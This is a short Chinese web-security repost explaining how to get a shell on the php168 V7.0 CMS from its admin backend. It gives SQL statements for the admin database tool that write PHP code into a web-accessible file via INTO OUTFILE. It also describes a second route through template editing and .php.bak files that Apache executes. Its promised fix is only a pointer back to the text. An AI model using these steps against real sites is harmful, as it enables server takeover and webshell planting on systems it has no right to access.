php168 V7.0 最新后台拿Shell方法及修复 - 网站安全

php168 V7.0 最新后台拿Shell方法方法很简单利用后台的运行sql语句代码写一句话 PHpMyadmin写一句话参考：http://www.2cto.com/Article/201210/164520.html

系统功能— 数据库工具

Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php phpinfo();?>'); select cmd from a into outfile 'D:/qibosoft/www/admin/8090sec.php'; Drop TABLE IF EXISTS a;

方法2：

其他功能---模板设置-- 模板可编辑可改格式也可以在常用功能->数据库管理->运行sql Select '<?phpinfo()?>' into outfile '网站路径:\\1.php' 如果不能outfile还可以想办法弄.php.bak这种形式的文件，apache会直接当作php解析的修复：请查阅上文

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did15018

更新时间：2022-09-13 阅读：203次